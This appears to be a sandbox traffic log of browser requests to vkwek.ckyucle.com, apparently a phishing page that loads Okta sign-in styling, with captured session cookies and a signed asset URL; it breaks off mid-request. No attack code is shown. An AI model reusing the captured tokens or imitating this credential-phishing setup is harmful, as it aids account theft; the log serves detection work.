Source: global traffic	HTTP traffic detected: GET /yzBt71gp856BSdkJ4Qop47 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /78l8NmRVxJ45fjuJRst60 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /45TplGCNDXCptZb896Wyz84jpQxy69 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=64710-64710If-Range: "28feccc0-15d9d"
Source: global traffic	HTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=64710-89500If-Range: "28feccc0-15d9d"
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T073932Z&X-Amz-Expires=300&X-Amz-Signature=aca7c6b73d5e3c084a388576b46174841ccd1d5d20df0b47f08acd7640c141a5&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ef6ywsH6ValAwIHzgds78wUwuLf89smkl92 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: 